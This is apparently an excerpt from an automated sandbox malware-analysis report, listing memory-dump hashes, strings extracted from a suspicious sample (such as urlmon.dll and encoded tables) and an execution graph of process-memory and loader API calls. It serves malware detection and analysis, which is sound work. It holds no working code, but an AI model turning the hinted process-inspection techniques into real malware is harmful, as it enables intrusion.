                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71E06576200304BBDA14EE58DC41FEB37ADEFC9711F00404AF948AB241C631B9108BB9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d7d27ab89eeec58d02c5abb1da15ce926c5ec2d36fb9a5dd760dc7af64820874
                                                                                                                                                                                                                          • Instruction ID: dde4d2f6bb2f8387ea99642fa08969c51c599735fac501605aa2517a5bd85df7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7d27ab89eeec58d02c5abb1da15ce926c5ec2d36fb9a5dd760dc7af64820874
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10F08271C0520CEBDB14CF64D841BDEBBB8EB04320F2083AEE828DB2C0D63597518781
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6d3e2e548c88256e16610048d8a3b48e516802b3a9d293d2ed407ab9ee18d66e
                                                                                                                                                                                                                          • Instruction ID: 30ebfcc0c7a638f16a851ea3205c408af04ab41798135f8e3b0795bb21ba22b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d3e2e548c88256e16610048d8a3b48e516802b3a9d293d2ed407ab9ee18d66e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62E0863764172437D220AA999C4EFD7B76CDFC5E61F19007AFE089B340E578A90183E8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 1972d68aad8952f5dd3e8f32baf6f01b1cd2b4896fd7b5f55e378d2f00414785
                                                                                                                                                                                                                          • Instruction ID: a804aa29376645fa2a963bf11c5f7afd7182cba62788509ed223a9939b8ee3ca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1972d68aad8952f5dd3e8f32baf6f01b1cd2b4896fd7b5f55e378d2f00414785
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BF06571915108AADB14CF64D982EEDBB79EB49350F2083AEEC19DB280D63597519740
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b6402c6f6671649973d79a6cf2c850ecf815d48cd9a864bbf7ec5080e28ecf5e
                                                                                                                                                                                                                          • Instruction ID: 14ea8b48b699cdc677c9377b24ca585aa69e6ca588539c40af74374f31af2e82
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6402c6f6671649973d79a6cf2c850ecf815d48cd9a864bbf7ec5080e28ecf5e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFE046362002047BD620FA59DC40FEB7B6DEFC5711F408016FA88AB281C671B9018BB5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ea4b2dc6ad81b7d0bf5c4582a336df2cb254143633f169f038a43dcdfe2539ac
                                                                                                                                                                                                                          • Instruction ID: dc4c80af7498b74ed2758205568d4bcabba6ad21c0bc79d81e8495d66ad5d779
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea4b2dc6ad81b7d0bf5c4582a336df2cb254143633f169f038a43dcdfe2539ac
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFD02B72915008ABD714CB50CCE5FFF739ACB48340F08077AFC09CB640D52ED2A48140
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                                                                                                                                          • API String ID: 0-3248090998
                                                                                                                                                                                                                          • Opcode ID: a5c1018c71ca36858972f67e83ae9bacdbbcacff83a781af1f1f1ddc6213e778
                                                                                                                                                                                                                          • Instruction ID: 0cccde4ff40364fc3f8b34f348305424d78934ae55240b4bbd97d9acca7def00
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5c1018c71ca36858972f67e83ae9bacdbbcacff83a781af1f1f1ddc6213e778
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A991F0F09052998ACB118F55A4603DFBF71BB85204F1585EDC6A97B243C3BE4E85DF90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                                                                                                                                          • API String ID: 0-1002149817
                                                                                                                                                                                                                          • Opcode ID: 2b94cb816d906ef9726588da948cd06baee68c622b3df9941117fbb6426a9880
                                                                                                                                                                                                                          • Instruction ID: ec367256edf77315425d2843aa7c02ac95d1e8879edb165b2d17647443a6c1f0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b94cb816d906ef9726588da948cd06baee68c622b3df9941117fbb6426a9880
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CC140B1D013689EDB20DFA4CD44BEEBBB9AF05304F0085DAD54CAB241E7B55A88CF65
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                                                                                                                          • API String ID: 0-392141074
                                                                                                                                                                                                                          • Opcode ID: 266abc8d240435951306767dcddad510e5cad1a61a035b3f77ad4f5c22beebbc
                                                                                                                                                                                                                          • Instruction ID: aae53df585e52f66236f3de9893991677212a4389579ee00d7710507dff7b0d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 266abc8d240435951306767dcddad510e5cad1a61a035b3f77ad4f5c22beebbc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE716CB5C00718AADB25DFA4CD85FEEB77CBF48300F04459EE509AA240EB755B488FA1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                                                                                                                          • API String ID: 0-392141074
                                                                                                                                                                                                                          • Opcode ID: 8b9324ce1ccaad779d96e5f6e3ecf20613541b119aefd33250fb675f8f5e985b
                                                                                                                                                                                                                          • Instruction ID: 897c8952e54ff4b9de5e69d10fa17a46a65e45b78ff07111da943d2341a14527
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b9324ce1ccaad779d96e5f6e3ecf20613541b119aefd33250fb675f8f5e985b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 686159B5800318AADB25DFE4CD85FEEB77CBF48300F04459EE509AA240EB755B488FA1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                                                                                                          • API String ID: 0-685823316
                                                                                                                                                                                                                          • Opcode ID: e5f7c3db3805ccb616a7007d03cbe65a8cdb124bba6911f163b650bfc09660c3
                                                                                                                                                                                                                          • Instruction ID: 6c939aa076d8f8b966fcf802fc2393ef75d00f1e08aa454ed7cb9a9e89b47712
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5f7c3db3805ccb616a7007d03cbe65a8cdb124bba6911f163b650bfc09660c3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B82161B5D4131CAADB50DFA4CC85FEEBBB9BF04700F10815DE618BA280DBB556488BA4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: .$P$e$i$m$o$r$x
                                                                                                                                                                                                                          • API String ID: 0-620024284
                                                                                                                                                                                                                          • Opcode ID: c7e42513e10aeaa77825d5703d96e8c40b6cc8bd2bee33818cfff3dae11274bb
                                                                                                                                                                                                                          • Instruction ID: d947330771b67eb5ede80db12010332dfff2fee9725300fce560f3f37aa2fa11
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7e42513e10aeaa77825d5703d96e8c40b6cc8bd2bee33818cfff3dae11274bb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A951A9B98003186ADB21DFA0CD85FDE737DAF54300F0089DEA50D9B241EBB597898FA5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: *$.$3$4$F$G8k$T$|
                                                                                                                                                                                                                          • API String ID: 0-1677524064
                                                                                                                                                                                                                          • Opcode ID: 3022845aab4da92e13536ed1902619ea6677fc90db794137598faadd80313730
                                                                                                                                                                                                                          • Instruction ID: b56adba0bfa368817ce3a585a29fd24090af7387a350078ad5c9b90a8970bbc0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3022845aab4da92e13536ed1902619ea6677fc90db794137598faadd80313730
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E11DE10D0C3CED9DF12C7AC84587AEFF715F12258F4882D9D9A46B2C2D279470AC7A6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: L$S$\$a$c$e$l
                                                                                                                                                                                                                          • API String ID: 0-3322591375
                                                                                                                                                                                                                          • Opcode ID: 09f97a703cc8bee06f9b94275bc6c1928ee3870435e3e340437aaa374fc779bd
                                                                                                                                                                                                                          • Instruction ID: 9bad869034c8f12ed750aa557e74f1d304539f3b4e01962e8650108c5bb2705e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09f97a703cc8bee06f9b94275bc6c1928ee3870435e3e340437aaa374fc779bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B04196B2C00318AECB10DFA8DC85FEEB7F8AF88310F05469FD909A7200E77555458B94
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 4$@QL@$DX]W$U@][$UB]R$UDDX$]WU@
                                                                                                                                                                                                                          • API String ID: 0-3291571695
                                                                                                                                                                                                                          • Opcode ID: a3a9ad84e0d38c4614adda14fcc5887cb3fa3670ca711d3dd80549722ad723cb
                                                                                                                                                                                                                          • Instruction ID: 8db20b70707f153f742506f86b4defe9b49801e06a6fd218231b703e01796371
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3a9ad84e0d38c4614adda14fcc5887cb3fa3670ca711d3dd80549722ad723cb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 541130B0C05288ABDB04DFA5A9906DEFFB4FB11324F604118E42A7F204D7354A42CF94
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: F$P$T$f$r$x
                                                                                                                                                                                                                          • API String ID: 0-2523166886
                                                                                                                                                                                                                          • Opcode ID: 2058e128c8a07acd5e0be5572ec78ad0bcc3c71184b8730fc11f4b410895a2d3
                                                                                                                                                                                                                          • Instruction ID: 46e979033fd16242d47384fe67044c45aeae0a48e2f8da3124c41dfcdb4faa66
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2058e128c8a07acd5e0be5572ec78ad0bcc3c71184b8730fc11f4b410895a2d3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9651D371910705AADB34DF74CD88BEBF7B8FF14704F04461EE459AA280E7B6A644CB91
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $i$l$o$u
                                                                                                                                                                                                                          • API String ID: 0-2051669658
                                                                                                                                                                                                                          • Opcode ID: dc113726ada927580b6510bce2f9a351bd2bbfd295cd5cddce6e3ecf09a2f6bc
                                                                                                                                                                                                                          • Instruction ID: e2f57724584ab7f0f57d30fe123108882f2c65b8a170b65068894c43349b4173
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc113726ada927580b6510bce2f9a351bd2bbfd295cd5cddce6e3ecf09a2f6bc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE615FB5900308AFCB24DBA4CC84FEFB7FDAB88714F14455EE519A7240EB35AA45CB60
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $e$k$o
                                                                                                                                                                                                                          • API String ID: 0-3624523832
                                                                                                                                                                                                                          • Opcode ID: 1fc2d37dc15af20fe1fc25a08dc12bb132dcc16aac029dbb2feb8f04dd5bdf9d
                                                                                                                                                                                                                          • Instruction ID: 411d053160a14b9238e2a247fd12785eb7deaf6904b53b22ac5a1abe410bc4a9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fc2d37dc15af20fe1fc25a08dc12bb132dcc16aac029dbb2feb8f04dd5bdf9d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23B109B5A00304AFDB24DBA4CC85FEFB7BDAF88700F14855DF619A7240DA75AA41CB50
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $e$h$o
                                                                                                                                                                                                                          • API String ID: 0-3662636641
                                                                                                                                                                                                                          • Opcode ID: 8b342c7ba02d209fc4552fa57e47124f6fe954f370d59c8c23a092f740ca7b0b
                                                                                                                                                                                                                          • Instruction ID: a21afa750e0665209dbffe95f8851ae8ed89d52e79a36360521f0c357a6973ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b342c7ba02d209fc4552fa57e47124f6fe954f370d59c8c23a092f740ca7b0b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7981A2B2C4031A6ADB25DB60CD85FFE737CAF48300F0445AEE509AA241EB745B458FE5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $e$k$o
                                                                                                                                                                                                                          • API String ID: 0-3624523832
                                                                                                                                                                                                                          • Opcode ID: 45d3c964bc5532eff8f70ee376b0aa900bf66a4074014315008f3cf1dc49b856
                                                                                                                                                                                                                          • Instruction ID: 40348700c1662db559833877e89e159614b53ec9cf5c906e77dd81f8ac6e663c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45d3c964bc5532eff8f70ee376b0aa900bf66a4074014315008f3cf1dc49b856
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44612DB5A00308AFDB54DFA4CC84FEFB7BDAF88700F108559E659AB240D775AA41CB60
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                                                                                                                          • API String ID: 0-2877786613
                                                                                                                                                                                                                          • Opcode ID: b1faf90328379cb5a9e287adc3e3dc9b31ff735e1bad9ff9630dbdadbd9cc571
                                                                                                                                                                                                                          • Instruction ID: 2a0c2b07117417b32fdb644aed522d957f20fe7f65ca3177810a110ef60231ac
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1faf90328379cb5a9e287adc3e3dc9b31ff735e1bad9ff9630dbdadbd9cc571
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1413DB59112187AEB02EB94CD87FEF777DAF55700F40404AFA04AA280E7786A0587E6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $e$h$o
                                                                                                                                                                                                                          • API String ID: 0-3662636641
                                                                                                                                                                                                                          • Opcode ID: bcdb2f48bf0a621cbeece34435c1b495991272a645da566a6b502592fa563db4
                                                                                                                                                                                                                          • Instruction ID: 532f8a3eb625f3b64e1b536ffde21192b7f07ae5b223411986f285da89ad3491
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcdb2f48bf0a621cbeece34435c1b495991272a645da566a6b502592fa563db4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0415375C40319AADB14DBA4CD45FFEB37DAF48300F0085EAA50DAA241EB7467858FE5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: -$1$5$E
                                                                                                                                                                                                                          • API String ID: 0-3386120863
                                                                                                                                                                                                                          • Opcode ID: 6a64c15229702e7d05f1ac4d9035698d3f3043b7a3612be215f0a93311b6f7a2
                                                                                                                                                                                                                          • Instruction ID: 2bb7b66b4b807ab915f746bae2a75e5e20012340db94244236229578250f6b47
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a64c15229702e7d05f1ac4d9035698d3f3043b7a3612be215f0a93311b6f7a2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 363134B5D102097BEB04DFA4CD45BFF77B8EF58304F00459AE904AA240E7769A158BE5

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:0.5%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:93.8%
                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                          Total number of Nodes:48
                                                                                                                                                                                                                          Total number of Limit Nodes:3
                                                                                                                                                                                                                          execution_graph 80297 331f061 80298 331f08d 80297->80298 80299 331f209 NtQueryInformationProcess 80298->80299 80302 331f27c 80298->80302 80300 331f243 80299->80300 80301 331f321 NtReadVirtualMemory 80300->80301 80300->80302 80301->80302 80310 34a29f0 LdrInitializeThunk 80312 34e5170 80313 34e51be 80312->80313 80334 34e51c8 80313->80334 80347 34a2b10 LdrInitializeThunk 80313->80347 80315 34e520d 80345 34e5216 80315->80345 80348 34a2b20 80315->80348 80317 34e5236 80319 34a2b90 LdrInitializeThunk 80317->80319 80318 34e5352 80321 34e555f 80318->80321 80351 34a2c50 LdrInitializeThunk 80318->80351 80322 34e5254 80319->80322 80324 34e556f 80321->80324 80352 34a2a80 LdrInitializeThunk 80321->80352 80325 34a2b10 LdrInitializeThunk 80322->80325 80327 34e558c 80324->80327 80353 34a2b90 LdrInitializeThunk 80324->80353 80329 34e5276 80325->80329 80328 34e559c 80327->80328 80354 34a2a80 LdrInitializeThunk 80327->80354 80332 34e55ac 80328->80332 80355 34a2a80 LdrInitializeThunk 80328->80355 80335 34e52ad 80329->80335 80336 34e52f4 80329->80336 80329->80345 80332->80334 80356 34a2a80 LdrInitializeThunk 80332->80356 80338 34e55e0 565 API calls 80335->80338 80339 34a2e50 LdrInitializeThunk 80336->80339 80338->80345 80340 34e531c 80339->80340 80341 34a2c30 LdrInitializeThunk 80340->80341 80340->80345 80342 34e534c 80341->80342 80342->80318 80343 34a2c30 LdrInitializeThunk 80342->80343 80346 34e537e 80343->80346 80344 34a0554 12 API calls 80344->80345 80345->80318 80350 34a2c50 LdrInitializeThunk 80345->80350 80346->80344 80346->80345 80347->80315 80357 34a2b2a 80348->80357 80350->80318 80351->80321 80352->80324 80353->80327 80354->80328 80355->80332 80356->80334 80358 34a2b3f LdrInitializeThunk 80357->80358 80359 34a2b31 80357->80359 80360 92852d RtlDosPathNameToNtPathName_U 80361 9284e3 80360->80361 80361->80360 80362 9284fc 80361->80362

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
